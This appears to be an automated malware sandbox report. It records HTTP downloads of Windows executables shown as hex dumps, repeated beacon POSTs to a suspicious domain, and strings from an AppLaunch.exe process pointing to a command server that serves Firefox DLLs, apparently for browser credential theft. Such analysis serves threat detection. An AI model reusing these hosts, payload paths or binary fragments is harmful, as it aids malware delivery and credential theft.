Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 03 Oct 2022 15:35:31 GMTContent-Type: application/octet-streamContent-Length: 684984Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:40:08 GMTETag: "62543dc8-a73b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 03 Oct 2022 15:35:31 GMTContent-Type: application/octet-streamContent-Length: 254392Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:58 GMTETag: "62543dbe-3e1b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 03 Oct 2022 15:35:32 GMTContent-Type: application/octet-streamContent-Length: 1099223Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 12:28:56 GMTETag: "62541f08-10c5d7"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cubye.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yesum.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jigwqmj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://itraykmwbj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hrnurk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ycrqve.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://emgsptlj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cuxke.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sgmgrm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qxeovi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://atioeij.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: furubujjul.net
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: SERVERIUS-ASNL SERVERIUS-ASNL
Source: Joe Sandbox View IP Address: 104.21.93.30 104.21.93.30
Source: Joe Sandbox View IP Address: 104.21.93.30 104.21.93.30
Source: AppLaunch.exe, 00000014.00000003.429706137.0000000000969000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.430845442.0000000000969000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/
Source: AppLaunch.exe, 00000014.00000003.430856493.000000000096C000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.429706137.0000000000969000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/2
Source: AppLaunch.exe, 00000014.00000002.491668088.0000000000965000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.462970371.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.462853199.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.462885890.0000000000964000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463456279.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000002.491839052.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463531816.0000000000965000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/981c0ceb6cf45499fb5c43ee25c05c17
Source: AppLaunch.exe, 00000014.00000002.493073275.0000000007E65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/981c0ceb6cf45499fb5c43ee25c05c17%
Source: AppLaunch.exe, 00000014.00000002.491668088.0000000000965000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/981c0ceb6cf45499fb5c43ee25c05c17(
Source: AppLaunch.exe, 00000014.00000002.491668088.0000000000965000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/981c0ceb6cf45499fb5c43ee25c05c174
Source: AppLaunch.exe, 00000014.00000003.462940916.0000000000973000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/981c0ceb6cf45499fb5c43ee25c05c17d
Source: AppLaunch.exe, 00000014.00000003.462885890.0000000000964000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463531816.0000000000965000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/981c0ceb6cf45499fb5c43ee25c05c17ftK
Source: AppLaunch.exe, 00000014.00000003.462885890.0000000000964000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463531816.0000000000965000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/981c0ceb6cf45499fb5c43ee25c05c17it
Source: AppLaunch.exe, 00000014.00000003.463034703.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.456356159.0000000000989000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/981c0ceb6cf45499fb5c43ee25c05c17j4
Source: AppLaunch.exe, 00000014.00000002.491839052.000000000097D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/981c0ceb6cf45499fb5c43ee25c05c17l
Source: AppLaunch.exe, 00000014.00000003.463663290.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.462970371.000000000097D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/981c0ceb6cf45499fb5c43ee25c05c17v
Source: AppLaunch.exe, 00000014.00000003.430856493.000000000096C000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.429706137.0000000000969000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/V
Source: AppLaunch.exe, 00000014.00000003.453837647.000000000099F000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.454584536.000000000099F000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000002.491976725.000000000099C000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.454397915.000000000099F000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.454837408.000000000099F000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.449981114.000000000099F000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463770338.000000000099D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.454196299.000000000099F000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.454117600.000000000099F000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.454550115.000000000099F000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.454666751.000000000099F000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.453594076.000000000099F000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.453999456.000000000099F000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.452870795.000000000099F000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.452176222.000000000099F000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.453713248.000000000099F000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.454617472.000000000099F000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464612639.000000000099F000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.456443211.000000000099D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.454701196.000000000099F000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.452935532.000000000099F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT
Source: AppLaunch.exe, 00000014.00000003.447650077.0000000000963000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463723727.000000000098A000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.449553500.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.430460941.0000000000994000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.456269967.0000000000980000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.449388987.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463663290.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463034703.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.462970371.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.447855891.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000002.491953856.0000000000997000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451958511.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000002.491839052.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.448063318.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464503699.000000000097E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451832242.0000000000980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll
Source: AppLaunch.exe, 00000014.00000003.449388987.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.447855891.000000000097D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll.dll
Source: AppLaunch.exe, 00000014.00000003.447855891.000000000097D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll.dllTa
Source: AppLaunch.exe, 00000014.00000003.447855891.000000000097D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll.dllx
Source: AppLaunch.exe, 00000014.00000003.456269967.0000000000980000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.449388987.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463663290.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.462970371.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.447855891.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000002.491839052.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464503699.000000000097E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451832242.0000000000980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dllba
Source: AppLaunch.exe, 00000014.00000003.463723727.000000000098A000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.449553500.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463034703.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451958511.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.448063318.0000000000989000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dllcalLow
Source: AppLaunch.exe, 00000014.00000003.447855891.000000000097D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dllha
Source: AppLaunch.exe, 00000014.00000003.447855891.000000000097D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dlll
Source: AppLaunch.exe, 00000014.00000003.446776271.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463723727.000000000098A000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.449553500.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.430460941.0000000000994000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.446625470.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.456269967.0000000000980000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.449388987.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463663290.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463034703.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.462970371.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.447855891.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000002.491953856.0000000000997000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451958511.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000002.491839052.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.448063318.0000000000989000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464503699.000000000097E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.446430447.0000000000963000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451832242.0000000000980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll
Source: AppLaunch.exe, 00000014.00000003.446625470.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.456269967.0000000000980000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.449388987.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.463663290.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.462970371.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.447855891.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000002.491839052.000000000097D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.464503699.000000000097E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000014.00000003.451832242.0000000000980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.38.55.180/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll.dll
